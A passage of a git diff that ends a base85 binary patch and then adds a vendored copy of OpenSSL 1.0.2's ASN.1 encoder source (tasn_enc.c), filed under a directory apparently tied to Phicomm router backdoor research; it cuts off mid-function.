zSTT|a&*?t}vrH%XyBbFv?s6pdSrZWtv%n8qTv;77K5a@r3sNl+Wany)(o4vH3=_y1
z4XgcGW%X7E9gVWOydgCBklY9I)VXtJ#ACbjjmm<&7h_}f0jW5>X#$H<P12{)akU)#
z*7QpPq?uO(Fnb7@an_FMT5FQ4M@pf9OgR{1bKb*NG3U?`C-Vfv_8;4dh-#MAknt|X
zG8FTDp3SbgJ6(tMEY&dBM59Cq5+&Q{&AiorI(7-pY}r^O=+F93XLd5xN!Nh!DI1ue
zKq#C=rkQ2aKiUYwQ)C8ZMZ-8NeDs-R1yBDd_E<I<N=%bu`_q0(BXm*$r-s13C9GDz
z0g8Q6e8j6v2LHWI<{VRch*ky%>dwGkllA~;*`X`lU5rSH-y%z~iE13xCblGVjsKXM
zD3(LU8P)js1&mAClW@d{X{0v1r@JvfWPCt|!K*}Pq?Le3*Dz9LS<ru)`B$a<O+8e`
z^>le!FT27^kid2aktH#m5HI6l#Zt&POVt|@I&9tzQ^yfbl=Zw?_7IYNtVD|+smT0%
zAi0O_RF}2{{Pn4s8%zON8F~tVfM~r;5E3_rbU%u<N%aV+@iUYs5|^oJs*)bTOwxl^
ztY%6uuT4ZyC_`nKMa9dklp%RJ&)g0EQDt?LvVtm?6~vTTzC-#|r{uF^j$BA35%$`S
z2fHfLo|Ki*T34}tH7$x$42*^hR_4$a1SM_$A;u)*+82<Q?*)v6bem))V7j2C|MVsC
zC+~?0lUH6~BjnzznJ+XfP)51Jg?TI?R<ILfewUv}yWrK|Alg8RL#}Be4f%w4?;_sl
zbC_Mnn6Fh7!+uJPOcP3+6@+_JfBA&nNWQH>!*cjR%^p=3Ll&H5_LV5{5eEwbcB4R6
zVUe&)E~kOiONc{SGzMX^$yh6KEk_KQv6BT8HGZf9d|g<niWWBG!t>Bl7#b#9F6k|q
zrL1Gwj&5t|AAbQYK<=gM3YmSmM0K({bNv`<0*{*-qEa`c7MPmwlMm^dz8j3dzD$Zi
z6jXC5RvK#EC0Av(nGr{qy7XcYnXfzXIy63^rRl>(A#1xaQ_BvIN)CO<v^puw)Ms01
zn03RryO-bpTP+b|39JD*3jR^&f5t}1fH#uYpl<`)^%{=Xp8m7oJuU)}<=Ce84Ezy8
z=_1S#b`lOdVQ}#2UM;Z-$4B}uf%JX@J^V?QG1zjM%R|ONj=z9yg+YeH@d!gIhcoTv
zP&hqPEu@39Z`>KVf-1+Kta?WE*r^&{P;9&4I~R60zOB5|pkTLemDp;Ek;K7zZ4mha
zIT8ON9I^B*wxxaR*vEq0c^!MdS$18tHdWW@&_zukSfSs`D6_PUahw>XTI(5te7Hd?
z#*4;5I^>os-+ea;-Q#Cm2TDBs4<df42(x4R@yz7-NKyQP<BDWFIh9U>Gw2}bQdam!
zn{Xgj8W1Zu5H~1|sgVz9kF#$E{JzCXVjQelNi>ROrY<sfTE`;nSiB7#x_FU&yedfO
z1~!?|v5VDw>+S>NTy6C=q(rZpxCNhEXwzZ=Df6bufpQG7v38JxvGm{KhqeZ4>gb*w
zAtZI$n<*Cr#=&<6_QVX_ZGR6cGxFI-k_}Xay(mwVSLtI8a*`J$Qj=MF%gImXXNkKb
zU~?a>0I7CMp#`+_9WWCUZ6KNMFn9P2Nx#=zf%YSX&rr@fj8q6=f08bVnisC{H^IyZ
zXO!eqyx5Z*YuBLW@zV}jI`ea+ovDyCb43%$%t9>lGHs=D%_zxz!l2l)hjq0O*8C%d
zdAtL$@cFVFu}$%{2wp>cA)M3%KA_PtE^NGJh8AuU2g>k80wnX25Q~o2xU_}j5*9hD
zP>5E9jk8Ka10`8k1EPlt(M_rSf6m2^sMVD$PKXoyR4Q4YnkX?1_2XykxaCi#9|u4w
znm$;u1dY=XRdL$RWvSmGOTbf4sSBvaIM>TAuq;8mpoj9IBVC_QeU@e=;N~$$WjyrN
zaJ~ubxOiQ`Yw2Eink-&MdCU9~2)DhPs%1%Sy<DEh_!WZjDJYOqs<GHO%Ok7MUCvA)
zsWm8iq$as?nk`LKAA*Gce;S?6s8M#!*XY1P?SFcD8C79A+t+?XA8XdKmKZJ@8>xl^
zedg24Uu*cYk3VzlEjewBuJbnU?20ax>bFGO+m=e^i?pn+?q+Yr%8juOJ?33pd3~jC
zq5q~Bd-d;G<g4^m%{O6*<RjKp*OuMBlFXGP%!xm0)69qD_;#b@=q+<xHKo+`D3qi*
zGx^xH{HfyU<NZc5K&`v%ks{Sy{;)IX_6`;Y-4zc_2)KRUD+#!(<D~(2pTl`=k-J)P
z`xJLYt=n7cF2|HwH*{>n^j)0SYh+Z$3j`uBHOFficojw5dmTadqmFv_V~$$)e*7J9
zDDGc4Zl{H=apYZy^mvc2b0vS09v683`=m!b>A}{9ka_fIaBhPd(Ci{Lr2Uv4;6bs7
z3_GR=<5f#GfdRf(qL?<>?<jf}at9!Ht@}CrCGmF@e<z^_2G@PlU<!k^1!g+mfCci(
zco<@(xQtUu@nX|ApNzko#N`N1UXw?n0K{EE;@*eBAS7zWQvtA?<}CxTVzQ22y&$Xt
zHLZEhA2~2eMo?@<SO+G~InI2}tbpjhAb+8C(@)S{7B338Yw+Qs-rb<N)jD@gi@Qug
zfc0beElwNF#p;-kFVeZIXt%q!4v`c@lm!rFbv(*6cURH7?%rAqHMn~fyhY5nX7;vr
zlDjvEvHHoI^2xjba<uWywtIY>=Z}vKMJwE!1MaRMaR*ySqd=Ml_lBa+@+|=V<@h_w
z*9f35sqUKZ&?ftaMxqo;XS4Z8oVlble$<)E8g`rle|(#Q*CK(Bl|!!Lxb@ER2(Sel
z-^qQ(asse(_;Vn8ZNQT?9>>&ovaDvp)-UN#>yF~;OpWbHvkQ6({_$-sUWtA(`>zv{
z#C!y-ljBccYSOb9GP~e|Z#{XMQ<{_qB{?Twgg?lTi{+s&F%smodyhU467FHo@juRs
zs3qy|K|;CD-u@LpKK%It`0)bx=>qu2z%PY8RUQ&n&i#Vp8#&JME-*UI<&$T60eo%&
z{Q3eoeGbmY|IPyV_5%3M0=Q8Cf1&{X6X0Z@3LX+HAHxoG`OPQi%LVYa3*es?z$ao~
z<>OB`x_o#=0sO`SxCWf`s^a^F<!9)%x&VD^0eou#{N4gM<qKMO@8wtwjrKoldP`47
zq%GQ7*(#yukF;)%wr-0=JIB51?a>ZC+}Yk9ZPhDVJ3D&xuI|pRN}oB<wrEQv+8gQW
z-m-m*zU98CiR#hqUF|J;l!icI13NmSy<H5i4AuE0{P^i-krY`Lx}#PJMeeAtZwfX?
znw8p6Fd`{UxBDaaMD<AL#;uS+3N|)Ix?*}H+TGpREkz<ddJ9Bv-MlTbsbx#MRJ*c1
z5)OtV_jGseh_tpxTRKb*ddoeFHg3^PSs+&{<YKIw*E9qp9nl@aTTfJ%Fdkv!choKq
z)-{j4*J{m?rshWN_GM$3c6)PhS+LP$VGc%goJ<+ty2dpP&38mLbw{J)2xt|y0-rEO
zz(g8*-2!`BreqT=fTU*bBlB#cGjOC!?>3oQG>i=+!g?@M=a$xJq$f)5g!$M&TW6%D
zZKF9Y=en_Z(T>(gPYZlYmTzfmGc6x!YtdVTrO3}c+eqO^N36Y_^<&%V(bd_-9<iRy
zwl!!DYyW0G*m;~n71uV_?!bPfMrm;d{w$pG4K+JX`#vAO3H!jp={#WZS;@}@c0NxD
z_!R>ED*`Uca|1Czqld_U4aaGDs*3CJN9|dGp6(HrJbw`Is|9=tT~N?0J{J9Aj?=VR
z__OdI3i!7K{22lF3V0bm4-lW(0`3=ZQQy@9K1ZP6CE#-f{BZ#n`TUcB%L4uD0zOZ`
zf5r<x$tm(_=SL1ZUd@jjgo}Q>Q@}+&KN4^{i&^%3Rlr4kKNN70&!xP6(Yj(h{FLLC
zA7zYFTR{gxG`su;$1Qp*eonJbt0q026)icx<z{RcAG!}%c%OjJ7x1SA{I3N3UVe}w
zc|`ul1bl%&KO*4by6brHBtF*(^mC@-1<kJSO#&|RUn}4u|EPeA{Nn<?5bIcWI4<C#
z9p2$M*_pZ){RaY0rQ5<k6ZljL_}2pcWdc5l*L~7gq@OL|Vx05}_%#BbCk0%jzlRn>
zv)l6#0rz3tlK+PS?icW%2>2oae_p^vyDjD)NN8PA&eZ~by};)I0T=hnpn!{hd`7@U
z{ucyXv_q2LQ|xxA=I0+fUMJw<x-kJ4`5!8PLq*moe(0}V$g?zH;Xmd$Ph&a!agI+R
zVl<2XJjbmwsD-cNI5$I%Ug0>&OwFQq@_b6QhMI+!a@@<%F?=$|Wg9-s`O_YxX7PEB
z=QXk+H4A^1=NF1SY8L)9&tFw0oWn=C0jh2Ie{lR38$ONWH8y;huj{qp{8h5AOF52O
zANw7X)4Fe`Y`ArQ`_hJ6_cxWFLo9u*`}T)6+`8xdk_gc(dh4DrV#BTb_GW$#vFNS)
z`3W0to%^NAo}JtEmW_Do-R5(%)$5M7w^ZuUUR|nWN4m<5Jv~w-L%Tao#C+0Re<jZ9
zt)1JqM>{~@(Wyr(@!fPGJA?E0dpcs3bVZ1E>pMB0=w_ULTee3{CI1h<Ud$yE^6<=Y
zs^Ps8e1BR4+}zfyL^YjqKur!YJ1P(KBxg+FNpr1zYVD_MIL^&%PR8#PN@jVQeSO*=
z#PfeU|3=Iuo;)njGn<#MzrnVk*COCg%Jup5cTurLdyLN~{b{S)^}iJukx*?ATOT(N
zPrtb#OC0MN#t8MTd|(m&fY0Y*STLid7i<11p`Rl{CuuoI1oO~t0!Ckz?Dn(fdod<9
zOMeU7gAU1JpFhIaAF(;sKA-;Mem?u}r@%m?|NW90*`HFXHQ!P%-`Yf<<ca+PF-N2H
sN4~Jnr(?2BL?Dv%+-&xc5;n!SIOZUJ>3EZG{(*%i$=)2L*|E?6Zvc3yhyVZp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_enc.c
new file mode 100644
index 0000000..f04a689
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_enc.c
@@ -0,0 +1,661 @@
+/* tasn_enc.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+
+static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out,
+                                 const ASN1_ITEM *it, int tag, int aclass);
+static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out,
+                            int skcontlen, const ASN1_ITEM *item,
+                            int do_sort, int iclass);
+static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out,
+                                const ASN1_TEMPLATE *tt, int tag, int aclass);
+static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out,
+                               const ASN1_ITEM *it, int flags);
+
+/*
+ * Top level i2d equivalents: the 'ndef' variant instructs the encoder to use
+ * indefinite length constructed encoding, where appropriate
+ */
+
+int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out,
+                       const ASN1_ITEM *it)
+{
+    return asn1_item_flags_i2d(val, out, it, ASN1_TFLG_NDEF);
+}
+
+int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it)
+{
+    return asn1_item_flags_i2d(val, out, it, 0);
+}
+
+/*
+ * Encode an ASN1 item, this is use by the standard 'i2d' function. 'out'
+ * points to a buffer to output the data to. The new i2d has one additional
+ * feature. If the output buffer is NULL (i.e. *out == NULL) then a buffer is
+ * allocated and populated with the encoding.
+ */
+
+static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out,
+                               const ASN1_ITEM *it, int flags)
+{
+    if (out && !*out) {
+        unsigned char *p, *buf;
+        int len;
+        len = ASN1_item_ex_i2d(&val, NULL, it, -1, flags);
+        if (len <= 0)
+            return len;
+        buf = OPENSSL_malloc(len);
+        if (!buf)
+            return -1;
+        p = buf;
+        ASN1_item_ex_i2d(&val, &p, it, -1, flags);
+        *out = buf;
+        return len;
+    }
+
+    return ASN1_item_ex_i2d(&val, out, it, -1, flags);
+}
+
+/*
+ * Encode an item, taking care of IMPLICIT tagging (if any). This function
+ * performs the normal item handling: it can be used in external types.
+ */
+
+int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out,
+                     const ASN1_ITEM *it, int tag, int aclass)
+{
+    const ASN1_TEMPLATE *tt = NULL;
+    unsigned char *p = NULL;
+    int i, seqcontlen, seqlen, ndef = 1;
+    const ASN1_COMPAT_FUNCS *cf;
+    const ASN1_EXTERN_FUNCS *ef;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_aux_cb *asn1_cb = 0;
+
+    if ((it->itype != ASN1_ITYPE_PRIMITIVE) && !*pval)
+        return 0;
+
+    if (aux && aux->asn1_cb)
+        asn1_cb = aux->asn1_cb;
+
+    switch (it->itype) {
+
+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates)
+            return asn1_template_ex_i2d(pval, out, it->templates,
+                                        tag, aclass);
+        return asn1_i2d_ex_primitive(pval, out, it, tag, aclass);
+        break;
+
+    case ASN1_ITYPE_MSTRING:
+        return asn1_i2d_ex_primitive(pval, out, it, -1, aclass);
+
+    case ASN1_ITYPE_CHOICE:
+        if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL))
+            return 0;
+        i = asn1_get_choice_selector(pval, it);
+        if ((i >= 0) && (i < it->tcount)) {
+            ASN1_VALUE **pchval;
+            const ASN1_TEMPLATE *chtt;
+            chtt = it->templates + i;
+            pchval = asn1_get_field_ptr(pval, chtt);
+            return asn1_template_ex_i2d(pchval, out, chtt, -1, aclass);
+        }
+        /* Fixme: error condition if selector out of range */
+        if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL))
+            return 0;
+        break;
+
+    case ASN1_ITYPE_EXTERN:
+        /* If new style i2d it does all the work */
+        ef = it->funcs;
+        return ef->asn1_ex_i2d(pval, out, it, tag, aclass);
+
+    case ASN1_ITYPE_COMPAT:
+        /* old style hackery... */
+        cf = it->funcs;
+        if (out)
+            p = *out;
+        i = cf->asn1_i2d(*pval, out);
+        /*
+         * Fixup for IMPLICIT tag: note this messes up for tags > 30, but so
+         * did the old code. Tags > 30 are very rare anyway.
+         */
+        if (out && (tag != -1))
+            *p = aclass | tag | (*p & V_ASN1_CONSTRUCTED);
+        return i;
+
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+        /* Use indefinite length constructed if requested */
+        if (aclass & ASN1_TFLG_NDEF)
+            ndef = 2;
+        /* fall through */
+
+    case ASN1_ITYPE_SEQUENCE:
+        i = asn1_enc_restore(&seqcontlen, out, pval, it);
+        /* An error occurred */
+        if (i < 0)
+            return 0;
+        /* We have a valid cached encoding... */
+        if (i > 0)
+            return seqcontlen;
+        /* Otherwise carry on */
+        seqcontlen = 0;
+        /* If no IMPLICIT tagging set to SEQUENCE, UNIVERSAL */
+        if (tag == -1) {
+            tag = V_ASN1_SEQUENCE;
+            /* Retain any other flags in aclass */
+            aclass = (aclass & ~ASN1_TFLG_TAG_CLASS)
+                | V_ASN1_UNIVERSAL;
+        }
+        if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL))
+            return 0;
+        /* First work out sequence content length */
+        for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) {
+            const ASN1_TEMPLATE *seqtt;
+            ASN1_VALUE **pseqval;
+            seqtt = asn1_do_adb(pval, tt, 1);
+            if (!seqtt)
+                return 0;
+            pseqval = asn1_get_field_ptr(pval, seqtt);
+            /* FIXME: check for errors in enhanced version */
+            seqcontlen += asn1_template_ex_i2d(pseqval, NULL, seqtt,
+                                               -1, aclass);
+        }
+
+        seqlen = ASN1_object_size(ndef, seqcontlen, tag);
+        if (!out)
+            return seqlen;
+        /* Output SEQUENCE header */
+        ASN1_put_object(out, ndef, seqcontlen, tag, aclass);
+        for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) {
+            const ASN1_TEMPLATE *seqtt;
+            ASN1_VALUE **pseqval;
+            seqtt = asn1_do_adb(pval, tt, 1);
+            if (!seqtt)
+                return 0;
+            pseqval = asn1_get_field_ptr(pval, seqtt);
+            /* FIXME: check for errors in enhanced version */
+            asn1_template_ex_i2d(pseqval, out, seqtt, -1, aclass);
+        }
+        if (ndef == 2)
+            ASN1_put_eoc(out);
+        if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL))
+            return 0;
+        return seqlen;
+
+    default:
+        return 0;
+
+    }
+    return 0;
+}
+
+int ASN1_template_i2d(ASN1_VALUE **pval, unsigned char **out,
+                      const ASN1_TEMPLATE *tt)
+{
+    return asn1_template_ex_i2d(pval, out, tt, -1, 0);
+}
+
+static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out,
+                                const ASN1_TEMPLATE *tt, int tag, int iclass)
+{
+    int i, ret, flags, ttag, tclass, ndef;
+    flags = tt->flags;
+    /*
+     * Work out tag and class to use: tagging may come either from the
+     * template or the arguments, not both because this would create
+     * ambiguity. Additionally the iclass argument may contain some
+     * additional flags which should be noted and passed down to other
+     * levels.
+     */
+    if (flags & ASN1_TFLG_TAG_MASK) {
+        /* Error if argument and template tagging */
+        if (tag != -1)
+            /* FIXME: error code here */
+            return -1;
+        /* Get tagging from template */
+        ttag = tt->tag;
+        tclass = flags & ASN1_TFLG_TAG_CLASS;
+    } else if (tag != -1) {
+        /* No template tagging, get from arguments */
+        ttag = tag;
+        tclass = iclass & ASN1_TFLG_TAG_CLASS;
+    } else {
+        ttag = -1;
+        tclass = 0;
+    }
+    /*
+     * Remove any class mask from iflag.
+     */
+    iclass &= ~ASN1_TFLG_TAG_CLASS;
+
+    /*
+     * At this point 'ttag' contains the outer tag to use, 'tclass' is the
+     * class and iclass is any flags passed to this function.
+     */
+
+    /* if template and arguments require ndef, use it */
+    if ((flags & ASN1_TFLG_NDEF) && (iclass & ASN1_TFLG_NDEF))
+        ndef = 2;
+    else
+        ndef = 1;
+
+    if (flags & ASN1_TFLG_SK_MASK) {
+        /* SET OF, SEQUENCE OF */
+        STACK_OF(ASN1_VALUE) *sk = (STACK_OF(ASN1_VALUE) *)*pval;
+        int isset, sktag, skaclass;
+        int skcontlen, sklen;
+        ASN1_VALUE *skitem;
+
+        if (!*pval)
+            return 0;
+
+        if (flags & ASN1_TFLG_SET_OF) {
+            isset = 1;
+            /* 2 means we reorder */
+            if (flags & ASN1_TFLG_SEQUENCE_OF)
+                isset = 2;
+        } else
+            isset = 0;
+
+        /*
+         * Work out inner tag value: if EXPLICIT or no tagging use underlying
+         * type.
+         */
+        if ((ttag != -1) && !(flags & ASN1_TFLG_EXPTAG)) {
+            sktag = ttag;
+            skaclass = tclass;
+        } else {
+            skaclass = V_ASN1_UNIVERSAL;
+            if (isset)
+                sktag = V_ASN1_SET;
+            else
+                sktag = V_ASN1_SEQUENCE;
+        }
+
+        /* Determine total length of items */
+        skcontlen = 0;
+        for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) {
+            skitem = sk_ASN1_VALUE_value(sk, i);
+            skcontlen += ASN1_item_ex_i2d(&skitem, NULL,
+                                          ASN1_ITEM_ptr(tt->item),
+                                          -1, iclass);
+        }
+        sklen = ASN1_object_size(ndef, skcontlen, sktag);
+        /* If EXPLICIT need length of surrounding tag */
+        if (flags & ASN1_TFLG_EXPTAG)
+            ret = ASN1_object_size(ndef, sklen, ttag);
+        else
+            ret = sklen;
+
+        if (!out)
+            return ret;
+
+        /* Now encode this lot... */
+        /* EXPLICIT tag */
+        if (flags & ASN1_TFLG_EXPTAG)
+            ASN1_put_object(out, ndef, sklen, ttag, tclass);
+        /* SET or SEQUENCE and IMPLICIT tag */
+        ASN1_put_object(out, ndef, skcontlen, sktag, skaclass);
+        /* And the stuff itself */
+        asn1_set_seq_out(sk, out, skcontlen, ASN1_ITEM_ptr(tt->item),
+                         isset, iclass);
+        if (ndef == 2) {
+            ASN1_put_eoc(out);
+            if (flags & ASN1_TFLG_EXPTAG)
+                ASN1_put_eoc(out);
+        }
+
+        return ret;
+    }
+
+    if (flags & ASN1_TFLG_EXPTAG) {
+        /* EXPLICIT tagging */
+        /* Find length of tagged item */
+        i = ASN1_item_ex_i2d(pval, NULL, ASN1_ITEM_ptr(tt->item), -1, iclass);
+        if (!i)
+            return 0;
+        /* Find length of EXPLICIT tag */
+        ret = ASN1_object_size(ndef, i, ttag);
+        if (out) {
+            /* Output tag and item */
+            ASN1_put_object(out, ndef, i, ttag, tclass);
+            ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item), -1, iclass);
+            if (ndef == 2)
+                ASN1_put_eoc(out);
+        }
+        return ret;
+    }
+
+    /* Either normal or IMPLICIT tagging: combine class and flags */
+    return ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item),
+                            ttag, tclass | iclass);
+
+}
+
+/* Temporary structure used to hold DER encoding of items for SET OF */
+
+typedef struct {
+    unsigned char *data;
+    int length;
+    ASN1_VALUE *field;
+} DER_ENC;
+
+static int der_cmp(const void *a, const void *b)
+{
+    const DER_ENC *d1 = a, *d2 = b;
+    int cmplen, i;
+    cmplen = (d1->length < d2->length) ? d1->length : d2->length;
+    i = memcmp(d1->data, d2->data, cmplen);
+    if (i)
+        return i;
+    return d1->length - d2->length;
+}
+
+/* Output the content octets of SET OF or SEQUENCE OF */
+
+static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out,
+                            int skcontlen, const ASN1_ITEM *item,
+                            int do_sort, int iclass)
+{
+    int i;
+    ASN1_VALUE *skitem;
+    unsigned char *tmpdat = NULL, *p = NULL;
+    DER_ENC *derlst = NULL, *tder;
+    if (do_sort) {
+        /* Don't need to sort less than 2 items */
+        if (sk_ASN1_VALUE_num(sk) < 2)
+            do_sort = 0;
+        else {
+            derlst = OPENSSL_malloc(sk_ASN1_VALUE_num(sk)
+                                    * sizeof(*derlst));
+            if (!derlst)
+                return 0;
+            tmpdat = OPENSSL_malloc(skcontlen);
+            if (!tmpdat) {
+                OPENSSL_free(derlst);
+                return 0;
+            }
+        }
+    }
+    /* If not sorting just output each item */
+    if (!do_sort) {
+        for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) {
+            skitem = sk_ASN1_VALUE_value(sk, i);
+            ASN1_item_ex_i2d(&skitem, out, item, -1, iclass);
+        }
+        return 1;
+    }
+    p = tmpdat;
+
+    /* Doing sort: build up a list of each member's DER encoding */
+    for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) {
+        skitem = sk_ASN1_VALUE_value(sk, i);
+        tder->data = p;
+        tder->length = ASN1_item_ex_i2d(&skitem, &p, item, -1, iclass);
+        tder->field = skitem;
+    }
+
+    /* Now sort them */
+    qsort(derlst, sk_ASN1_VALUE_num(sk), sizeof(*derlst), der_cmp);
+    /* Output sorted DER encoding */
+    p = *out;
+    for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) {
+        memcpy(p, tder->data, tder->length);
+        p += tder->length;
+    }
+    *out = p;
+    /* If do_sort is 2 then reorder the STACK */
+    if (do_sort == 2) {
+        for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++)
+            (void)sk_ASN1_VALUE_set(sk, i, tder->field);
+    }
+    OPENSSL_free(derlst);
+    OPENSSL_free(tmpdat);
+    return 1;
+}
+
+static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out,
+                                 const ASN1_ITEM *it, int tag, int aclass)
+{
+    int len;
+    int utype;
+    int usetag;
+    int ndef = 0;
+
+    utype = it->utype;
+
+    /*
+     * Get length of content octets and maybe find out the underlying type.
+     */
+
+    len = asn1_ex_i2c(pval, NULL, &utype, it);
+
+    /*
+     * If SEQUENCE, SET or OTHER then header is included in pseudo content
+     * octets so don't include tag+length. We need to check here because the
+     * call to asn1_ex_i2c() could change utype.
+     */
+    if ((utype == V_ASN1_SEQUENCE) || (utype == V_ASN1_SET) ||
+        (utype == V_ASN1_OTHER))
+        usetag = 0;
+    else
+        usetag = 1;
+
+    /* -1 means omit type */
+
+    if (len == -1)
+        return 0;
+
+    /* -2 return is special meaning use ndef */
+    if (len == -2) {
+        ndef = 2;
+        len = 0;
+    }
+
+    /* If not implicitly tagged get tag from underlying type */
+    if (tag == -1)
+        tag = utype;
+
+    /* Output tag+length followed by content octets */
+    if (out) {
+        if (usetag)
+            ASN1_put_object(out, ndef, len, tag, aclass);
+        asn1_ex_i2c(pval, *out, &utype, it);
+        if (ndef)
+            ASN1_put_eoc(out);
+        else
+            *out += len;
+    }
+
+    if (usetag)
+        return ASN1_object_size(ndef, len, tag);
+    return len;
+}
+
+/* Produce content octets from a structure */
+
+int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cout, int *putype,
+                const ASN1_ITEM *it)
+{
+    ASN1_BOOLEAN *tbool = NULL;
+    ASN1_STRING *strtmp;
+    ASN1_OBJECT *otmp;
+    int utype;
+    const unsigned char *cont;
+    unsigned char c;
+    int len;
+    const ASN1_PRIMITIVE_FUNCS *pf;
+    pf = it->funcs;
+    if (pf && pf->prim_i2c)
+        return pf->prim_i2c(pval, cout, putype, it);
+
+    /* Should type be omitted? */
+    if ((it->itype != ASN1_ITYPE_PRIMITIVE)
+        || (it->utype != V_ASN1_BOOLEAN)) {
+        if (!*pval)
+            return -1;
+    }
+
+    if (it->itype == ASN1_ITYPE_MSTRING) {
+        /* If MSTRING type set the underlying type */
+        strtmp = (ASN1_STRING *)*pval;
+        utype = strtmp->type;
+        *putype = utype;
+    } else if (it->utype == V_ASN1_ANY) {
+        /* If ANY set type and pointer to value */
+        ASN1_TYPE *typ;
+        typ = (ASN1_TYPE *)*pval;
+        utype = typ->type;
+        *putype = utype;
+        pval = &typ->value.asn1_value;
+    } else
+        utype = *putype;
+
+    switch (utype) {
+    case V_ASN1_OBJECT:
+        otmp = (ASN1_OBJECT *)*pval;
+        cont = otmp->data;
+        len = otmp->length;
+        break;
+
+    case V_ASN1_NULL:
+        cont = NULL;
+        len = 0;
+        break;
+
+    case V_ASN1_BOOLEAN:
+        tbool = (ASN1_BOOLEAN *)pval;
+        if (*tbool == -1)
+            return -1;
+        if (it->utype != V_ASN1_ANY) {
+            /*
+             * Default handling if value == size field then omit
+             */
+            if (*tbool && (it->size > 0))
+                return -1;
+            if (!*tbool && !it->size)
+                return -1;
+        }
+        c = (unsigned char)*tbool;
+        cont = &c;
+        len = 1;
+        break;
+
+    case V_ASN1_BIT_STRING:
+        return i2c_ASN1_BIT_STRING((ASN1_BIT_STRING *)*pval,
+                                   cout ? &cout : NULL);
+        break;
+
+    case V_ASN1_INTEGER:
+    case V_ASN1_NEG_INTEGER:
+    case V_ASN1_ENUMERATED:
+    case V_ASN1_NEG_ENUMERATED:
+        /*
+         * These are all have the same content format as ASN1_INTEGER
+         */
+        return i2c_ASN1_INTEGER((ASN1_INTEGER *)*pval, cout ? &cout : NULL);
+        break;
+
+    case V_ASN1_OCTET_STRING:
+    case V_ASN1_NUMERICSTRING:
